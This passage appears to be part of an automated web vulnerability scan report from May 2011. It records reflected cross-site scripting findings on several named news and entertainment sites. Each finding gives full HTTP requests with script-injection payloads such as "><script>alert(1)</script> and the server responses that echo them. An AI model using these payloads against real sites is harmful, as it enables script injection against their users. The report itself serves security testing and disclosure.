   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/users/logout/?40592"-alert(1)-"6794a9a72f1=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.200. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8f8'%3bc73e17508a0 was submitted in the REST URL parameter 1. This input was echoed as 1d8f8';c73e17508a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /News1d8f8'%3bc73e17508a0/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News1d8f8';c73e17508a0/Story/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.201. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e95c5'%3b27c78d71732 was submitted in the REST URL parameter 2. This input was echoed as e95c5';27c78d71732 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /News/Storye95c5'%3b27c78d71732/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News/Storye95c5';27c78d71732/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.202. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd126"-alert(1)-"900ecbe9de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?cd126"-alert(1)-"900ecbe9de5=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999932
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
="sportsillustrated.cnn.com,golf.com,fannation.com,sportsfanlive.com,sbnation.com";
s_265.mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.mmafighting.com/?cd126"-alert(1)-"900ecbe9de5=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.203. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a508"><script>alert(1)</script>5be8d4657ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a508"><script>alert(1)</script>5be8d4657ca=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

5.204. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917bd"><script>alert(1)</script>fd80077afb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:43 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1" />
...[SNIP]...

5.205. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f06"-alert(1)-"1a6d26d7f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:44 GMT; path=/
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Article";
s_265.prop9="bsd:19930968";
s_265.prop12="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1";
s_265.prop17="sources-fedor-hendo-fight-could-be-announced-within-24-72-hours";
s_265.prop19="mike-chiappetta";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_cod
...[SNIP]...

5.206. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f3c"-alert(1)-"56010fc58d0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
cle";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)do
...[SNIP]...

5.207. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa5f5"><script>alert(1)</script>b5c0de1ee4a was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a" />
...[SNIP]...

5.208. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae19"><script>alert(1)</script>22fc5ab7398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:29 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:28 GMT; path=/
Content-Type: text/html
Content-Length: 63649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1" />
...[SNIP]...

5.209. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c4"-alert(1)-"b34755837c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:30 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:29 GMT; path=/
Content-Type: text/html
Content-Length: 63576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
le";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)
...[SNIP]...

5.210. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4776d"><script>alert(1)</script>59ea0380dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4776d"><script>alert(1)</script>59ea0380dd4=1 HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:50 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:50 GMT; path=/
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 109015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
<link rel="canonical" href="http://www.moviefone.com/?4776d"><script>alert(1)</script>59ea0380dd4=1"/>
...[SNIP]...

5.211. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e187'-alert(1)-'e1daaea1081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /subscribe.aspx7e187'-alert(1)-'e1daaea1081 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:08 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=00AC81F260BA9A6D5FA9BF2E0A5F34B290777F13E4510D1166BCE4233715DDEC395F69E8143FCA0F905E564697A39C5855E5440A009381B14F7875F0917C6901D8FE5AE37B98CA6E21AAD688744FF342303E26421E926E5FA383B0022C4C45AF471CF31D7A9D60D5B866965A7C42DDCA932D74F3CA2E00A36A7F9949B4A359D81D6DCDB425DF75620502301B6EF64F4D920D4140F5819ED98494DEE07ECC46C9; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspx7e187'-alert(1)-'e1daaea1081&r=634401657685468750';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

5.212. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ee6f</script><script>alert(1)</script>846c743547c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /subscribe.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:05 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=09FEB47CFC6C6A3A9CA82F8313EDF2FE88BD584DCED8EA19F6FD5A6B17B4D3C5BFF448D5D70CC1BF473FFFE48C5DBACF66A47473612D3815F39076794F7B12ACF3C8D603D3511D39B29AD35BD13D362716DCA879751F283A6D1327219E1B538164FF4EA0D7830D9FB100B88E01C8BDB5DB7CF2F4D2637593CD2A55D43ECD5000BA7FB7D32E5787A99668E771D32E757968FCD8E1FC9BF5EEEC2F1574D9F16181; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

5.213. http://www.popeater.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d2e1"-alert(1)-"80c66c7340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?6d2e1"-alert(1)-"80c66c7340=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:56 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:56 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?6d2e1"-alert(1)-"80c66c7340=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
s_265.t
...[SNIP]...

5.214. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/hub/app-reviews

Issue detail

